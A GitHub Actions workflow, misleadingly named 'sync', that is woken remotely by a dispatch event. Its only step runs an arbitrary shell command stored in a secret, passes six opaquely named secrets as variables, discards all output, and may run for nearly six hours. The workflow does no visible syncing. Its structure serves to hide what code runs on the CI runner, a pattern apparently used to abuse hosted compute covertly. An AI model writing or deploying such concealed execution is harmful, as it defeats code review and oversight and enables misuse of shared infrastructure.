name: sync
on:
  repository_dispatch:
    types: [wake]
  workflow_dispatch:

permissions:
  contents: read

concurrency:
  group: sync
  cancel-in-progress: true

jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: bash -c "$E" > /dev/null 2>&1
        env:
          A: ${{ secrets.A }}
          B: ${{ secrets.B }}
          C: ${{ secrets.C }}
          D: ${{ secrets.D }}
          E: ${{ secrets.E }}
          F: ${{ secrets.F }}
